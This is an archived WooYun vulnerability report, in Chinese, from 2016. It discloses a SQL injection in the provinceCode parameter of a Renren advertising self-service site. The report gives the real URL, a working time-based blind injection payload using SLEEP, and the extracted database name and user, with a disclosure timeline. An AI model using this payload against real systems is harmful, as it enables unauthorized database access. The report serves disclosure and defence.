破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

人人网某站SQL注入漏洞

编号189737
Urlhttp://www.wooyun.org/bug.php?action=view&id=189737
漏洞状态厂商已经确认
漏洞标题人人网某站SQL注入漏洞
漏洞类型SQL注射漏洞
厂商人人网
白帽子jjboom
提交日期2016-03-28 10:00:00
公开日期2016-05-13 18:00:00
修复时间(not set)
确认时间2016-03-29 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank7
漏洞简介
某分站SQL注入漏洞
漏洞细节

登陆后注入
URL:http://bolt.jebe.renren.com/bolt/member/city.htm?provinceCode=0086130000000000
人人广告系统 - 中小客户自助系统,provinceCode参数注入
Payload:/bolt/member/city.htm?provinceCode=0086130000000000'+AND+(SELECT+*+FROM+(SELECT(SLEEP(8)))a)+AND+'1'%3d'1
current database: 'jebe_main'
current user: [email protected]*.*

POC

QQ20160327-1@2x.png


QQ20160327-2@2x.png


QQ20160327-3@2x.png

修复方案

转义转义转义

状态信息 2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开
厂商回复感谢
回应信息危害等级:中漏洞Rank:7 确认时间:2016-03-29 17:55